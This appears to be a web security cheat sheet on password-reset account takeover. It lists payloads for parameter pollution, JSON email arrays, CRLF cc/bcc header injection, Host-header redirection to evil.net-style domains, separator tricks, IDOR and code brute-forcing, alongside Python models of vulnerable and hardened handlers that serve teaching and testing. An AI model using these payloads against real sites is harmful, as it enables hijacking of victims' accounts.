Account Takeover



 💀ACCOUNT TAKEOVER💀

 

Password Reset Via Email Parameter

- using HPP (HTTP parameter pollution): send the parameter twice; the account lookup may read one value while the mailer reads the other, or both

email=hacker@gmail.com&email=victim@gmail.com

- array of emails (JSON body): a list where the server expects a single string

{"email":["victim@mail.com","hacker@mail.com"]}


IDOR on API Parameters

POST /api/changepass

[...]

{"form": {"email":"victim@email.com","password":"passwordchange"}}

The account to change is taken from the body, so a logged-in attacker swaps in the victim's email instead of their own.

 

Change the phone number when requesting the password reset link with the victim's email (forgot password): if the server takes the delivery number from the request instead of the profile, the reset link or code goes to the attacker's phone

{"number":"08989739847"}
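Added example, not the page's code, covering both the /api/changepass IDOR and the phone-number field above in one Python model. USERS, RESET_TOKENS and the field name current_password are assumptions; email, password and number come from the page's payloads. The hardened functions take the account from the session or from the issued token, and the delivery address from the stored profile, never from the request body.

```python
import secrets
import time
from dataclasses import dataclass


@dataclass
class User:
    email: str
    phone: str
    password: str


# Constructed sample user store (assumption, not from the page).
USERS = {
    "victim@email.com": User("victim@email.com", "+10000000001", "victim-old-pw"),
    "hacker@email.com": User("hacker@email.com", "+10000000002", "hacker-pw"),
}

RESET_TOKENS = {}        # token -> (account email, expiry as epoch seconds)
RESET_TTL = 15 * 60


def changepass_vulnerable(session_email, body):
    """Shape of the page's POST /api/changepass: the body names the account, so any
    logged-in user can aim 'email' at someone else. Returns the account changed."""
    target = USERS[body["form"]["email"]]
    target.password = body["form"]["password"]
    return target.email


def changepass_hardened(session_email, body):
    """The account is the one behind the session, full stop. A body 'email' that does
    not match is treated as tampering (None), and the current password (assumed field
    name current_password) has to be presented before anything changes."""
    form = body.get("form", {})
    if form.get("email", session_email) != session_email:
        return None
    user = USERS[session_email]
    if form.get("current_password") != user.password or not form.get("password"):
        return None
    user.password = form["password"]
    return user.email


def request_reset_vulnerable(body):
    """Reset request that honours a 'number' field in the same body, so the SMS with
    the link or code goes wherever the requester says. Returns (token, destination)."""
    email = body["email"]
    if email not in USERS:
        return None
    token = secrets.token_urlsafe(16)
    RESET_TOKENS[token] = (email, time.time() + RESET_TTL)
    return token, body.get("number", USERS[email].phone)


def request_reset_hardened(body):
    """Same flow, but the destination is always the phone stored on the profile and
    every other field in the body is ignored."""
    email = body["email"]
    if email not in USERS:
        return None   # a production handler answers the same either way to avoid enumeration
    token = secrets.token_urlsafe(16)
    RESET_TOKENS[token] = (email, time.time() + RESET_TTL)
    return token, USERS[email].phone


def consume_reset_hardened(token, new_password, now=None):
    """Finish the reset: the account is whatever the token was issued for, never a value
    from this request. Tokens are single-use and expire. Returns the account or None."""
    now = time.time() if now is None else now
    entry = RESET_TOKENS.pop(token, None)
    if entry is None:
        return None
    email, expires = entry
    if now > expires:
        return None
    USERS[email].password = new_password
    return email
```

The two hardened request functions look identical on purpose: the only difference from the vulnerable ones is which side of the trust boundary the account identifier and the delivery address come from.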

 

Carbon copy (CRLF injection into the mail headers: the payloads below use %0A%0D, the standard line break is %0D%0A, try both)

email=victim@mail.com%0A%0Dcc:hacker@mail.com

email=victim@mail.com%0A%0Dbcc:hacker@mail.com

 

Host header injection when requesting the password reset link with the victim's email (the link is built from the request's host, so the victim clicks through to the attacker's domain with the token in the URL)

- Host: evil.net

- X-Forwarded-Host: evilhost.net

- Host: website.com.evilhost.net (beats a check that only looks for the real domain as a prefix)
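Added example, not the page's code: how the three Host-header payloads above get a reset link onto an attacker's domain, and a hardened builder. website.com is the page's placeholder for the real site; CANONICAL_ORIGIN, ALLOWED_HOSTS and the /reset?token= path are assumptions.

```python
from urllib.parse import urlsplit

# Server-side configuration (assumption: the page's website.com is the real site).
CANONICAL_ORIGIN = "https://website.com"
ALLOWED_HOSTS = {"website.com", "www.website.com"}


def reset_link_vulnerable(headers, token):
    """Link built from X-Forwarded-Host / Host, the way a framework's 'absolute URL'
    helper does when it trusts the request. Whoever sets those headers in the reset
    request decides which server the victim's token is delivered to."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset?token={token}"


def reset_link_naive_check(headers, token):
    """The usual half-fix: accept the host if it starts with the real domain.
    website.com.evilhost.net passes."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    if not host.startswith("website.com"):
        return None
    return f"https://{host}/reset?token={token}"


def reset_link_hardened(headers, token):
    """The origin comes from configuration, never from the request. Host is still
    checked (port stripped, lowercased) and a value outside the allowlist rejects the
    request; X-Forwarded-Host is ignored because no trusted proxy is modelled here."""
    try:
        hostname = urlsplit("//" + headers.get("Host", "")).hostname
    except ValueError:          # malformed host such as an unclosed IPv6 bracket
        return None
    if hostname not in ALLOWED_HOSTS:
        return None
    return f"{CANONICAL_ORIGIN}/reset?token={token}"
```

Even if the allowlist check were wrong, the hardened builder never puts a request-supplied host into the mail, which is the property that actually matters. If the application sits behind a proxy that legitimately rewrites Host, the proxy is the place to normalise it, and the application should still compare against a fixed list.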


Separator (several addresses in one value; which one the mailer honours depends on how it splits the string)

email=victim@mail.com,hacker@mail.com

email=victim@mail.com%20hacker@mail.com

email=victim@mail.com|hacker@mail.com
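Added example, not code from the page: a Python model of the reset handler behind the HPP, array, carbon copy and separator payloads above. The user table ACCOUNTS_ON_FILE, the mailer model and the addresses are constructed assumptions. reset_recipients_vulnerable() shows who ends up with the link when the parameter is forwarded as sent; reset_recipient_hardened() accepts exactly one strictly formed value and mails only the stored copy of it.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample data (assumption, not from the page): addresses that exist in the
# application's user table. Only these may ever receive a reset link.
ACCOUNTS_ON_FILE = {"victim@mail.com", "admin@mail.com"}

# Deliberately tighter than RFC 5322: one address, no whitespace, no CR/LF, none of
# the ',', '|' or ' ' separators. A reset endpoint only has to match a stored value.
STRICT_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def mailer_recipients(to_value):
    """Model of a mailer that concatenates the user value into its header block.
    It honours injected Cc:/Bcc: lines and splits addresses on ',', '|' and spaces,
    which is exactly what the %0A%0D and separator payloads rely on.
    Returns every address the message would be delivered to."""
    headers = "To: " + to_value
    recipients = []
    for line in re.split(r"[\r\n]+", headers):
        name, _, value = line.partition(":")
        if name.strip().lower() in ("to", "cc", "bcc"):
            recipients.extend(a for a in re.split(r"[,| ]+", value.strip()) if a)
    return recipients


def reset_recipients_vulnerable(raw_body, content_type="form"):
    """Who receives the reset link when the handler forwards the parameter as sent:
    repeated form keys are joined into one recipient list, JSON lists are accepted,
    and the string reaches the mailer with no syntax check."""
    if content_type == "json":
        value = json.loads(raw_body)["email"]
        values = value if isinstance(value, list) else [value]
    else:
        values = parse_qs(raw_body)["email"]  # parse_qs keeps every repeated key
    return mailer_recipients(", ".join(values))


def reset_recipient_hardened(raw_body, content_type="form"):
    """Return the single on-file address to mail, or None to reject the request.
    Exactly one string value, strict syntax, and it must already be stored; what is
    mailed is the stored copy, never the client's string."""
    if content_type == "json":
        try:
            values = [json.loads(raw_body)["email"]]
        except (ValueError, KeyError, TypeError):
            return None
    else:
        values = parse_qs(raw_body).get("email", [])
    if len(values) != 1 or not isinstance(values[0], str):
        return None
    candidate = values[0].strip().lower()
    if not STRICT_EMAIL.fullmatch(candidate) or candidate not in ACCOUNTS_ON_FILE:
        return None
    return candidate


if __name__ == "__main__":
    for body, kind in [
        ("email=hacker@mail.com&email=victim@mail.com", "form"),
        ('{"email":["victim@mail.com","hacker@mail.com"]}', "json"),
        ("email=victim@mail.com%0A%0Dbcc:hacker@mail.com", "form"),
        ("email=victim@mail.com|hacker@mail.com", "form"),
        ("email=victim@mail.com", "form"),
    ]:
        print(kind, repr(body))
        print("  vulnerable mails:", reset_recipients_vulnerable(body, kind))
        print("  hardened mails:  ", reset_recipient_hardened(body, kind))
```

The hardened version rejects rather than sanitises: stripping commas or CR/LF out of a value still leaves the server mailing a string the client chose. Matching against the stored address and sending to that record is what closes the whole family at once.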


Sign in with Google and change your email to the victim's email

[screenshot of the attacker's profile form; recovered values: attacker, admin@gmail.com, 112333242424]

If the application applies the new address without making the user prove they control it, the attacker's account now answers for admin@gmail.com.
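Added example, not the page's code: a Python model of the Google sign-in plus email-change flow above. The claim names sub, email and email_verified are the ones a Google ID token carries; the stores, user ids and addresses are constructed. The vulnerable store resolves a later Google sign-in by the real admin@gmail.com owner to the attacker's account; the hardened store links on sub, only accepts verified email claims, and keeps a profile email change pending until a token sent to the new address comes back.

```python
import secrets


class IdentityStoreVulnerable:
    """Links Google sign-ins to local accounts by the e-mail claim alone and lets a
    profile e-mail change take effect immediately. Constructed model, not the page's code."""

    def __init__(self):
        self.users = {}      # user_id -> {"email": str}
        self._next_id = 1

    def _by_email(self, email):
        return next((uid for uid, u in self.users.items() if u["email"] == email), None)

    def sign_in_with_google(self, claims):
        uid = self._by_email(claims["email"])
        if uid is None:
            uid, self._next_id = self._next_id, self._next_id + 1
            self.users[uid] = {"email": claims["email"]}
        return uid

    def change_email(self, uid, new_email):
        self.users[uid]["email"] = new_email   # no proof the caller controls new_email
        return True


class IdentityStoreHardened:
    """Same operations with three checks: social logins are matched on the provider's
    stable 'sub' before any e-mail match, an e-mail match is only accepted when the
    provider marked it verified, and a profile e-mail change stays pending until a
    token delivered to the new address comes back."""

    def __init__(self):
        self.users = {}      # user_id -> {"email": str, "google_sub": str or None}
        self._pending = {}   # token -> (user_id, new_email)
        self._next_id = 1

    def _by_email(self, email):
        return next((uid for uid, u in self.users.items() if u["email"] == email), None)

    def _by_sub(self, sub):
        return next((uid for uid, u in self.users.items() if u["google_sub"] == sub), None)

    def sign_in_with_google(self, claims):
        uid = self._by_sub(claims["sub"])
        if uid is not None:
            return uid
        if not claims.get("email_verified"):
            return None                       # refuse to link on an unverified claim
        uid = self._by_email(claims["email"])  # stored e-mails are always verified here
        if uid is None:
            uid, self._next_id = self._next_id, self._next_id + 1
            self.users[uid] = {"email": claims["email"], "google_sub": claims["sub"]}
        else:
            self.users[uid]["google_sub"] = claims["sub"]
        return uid

    def change_email(self, uid, new_email):
        """Returns the verification token (to be mailed to new_email) or None if taken."""
        if self._by_email(new_email) is not None:
            return None
        token = secrets.token_urlsafe(16)
        self._pending[token] = (uid, new_email)
        return token

    def confirm_email(self, token):
        """Applies the pending change; re-checks uniqueness because the real owner may
        have claimed the address in the meantime. Returns the user id or None."""
        entry = self._pending.pop(token, None)
        if entry is None:
            return None
        uid, new_email = entry
        if self._by_email(new_email) is not None:
            return None
        self.users[uid]["email"] = new_email
        return uid
```

The uniqueness re-check in confirm_email is the part most implementations forget: checking at request time only is a race that the admin can lose by signing up between the request and the click.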

No rate limiting

Forgot password -> enter the email -> a code is sent to that email -> brute-force the code with Burp Suite Intruder -> reset the password
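Added example, not the page's code: the reset-code endpoint from the step above with and without an attempt limit, and the Intruder-style loop run against both. CODE_DIGITS, MAX_ATTEMPTS and CODE_TTL are assumptions; the code length is kept at four digits only so the loop finishes instantly.

```python
import hmac
import secrets
import time

CODE_DIGITS = 4        # kept short so the brute force below finishes instantly; the
                       # point is the attempt limit, not the code length
MAX_ATTEMPTS = 5
CODE_TTL = 10 * 60


class ResetCodeStore:
    """Per-account reset codes. limit_attempts=False reproduces the endpoint described
    above (guess as often as you like); the default invalidates the code after
    MAX_ATTEMPTS wrong guesses so a fresh request, and a fresh code, is needed."""

    def __init__(self, limit_attempts=True):
        self.limit_attempts = limit_attempts
        self._codes = {}   # email -> {"code": str, "attempts": int, "expires": float}

    def issue(self, email, now=None, code=None):
        """Create (or replace) the code for an account. 'code' may be fixed for a
        reproducible demo; in production it is random and goes to the mailbox only."""
        now = time.time() if now is None else now
        if code is None:
            code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._codes[email] = {"code": code, "attempts": 0, "expires": now + CODE_TTL}
        return code

    def verify(self, email, guess, now=None):
        now = time.time() if now is None else now
        entry = self._codes.get(email)
        if entry is None:
            return False
        if now > entry["expires"]:
            del self._codes[email]
            return False
        entry["attempts"] += 1
        if self.limit_attempts and entry["attempts"] > MAX_ATTEMPTS:
            del self._codes[email]      # too many tries: burn the code
            return False
        if hmac.compare_digest(entry["code"], guess):
            del self._codes[email]      # single use
            return True
        return False


def brute_force(store, email):
    """What Intruder does against the endpoint: walk the whole code space.
    Returns (code, tries) on success or (None, tries) if every guess was refused."""
    tries = 0
    for n in range(10 ** CODE_DIGITS):
        guess = f"{n:0{CODE_DIGITS}d}"
        tries += 1
        if store.verify(email, guess):
            return guess, tries
    return None, tries
```

The per-code counter is the minimum; the same endpoint also needs a per-IP and per-account request limit, and a new code must invalidate the old one so the attacker cannot keep a long-lived code alive by re-requesting.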

 
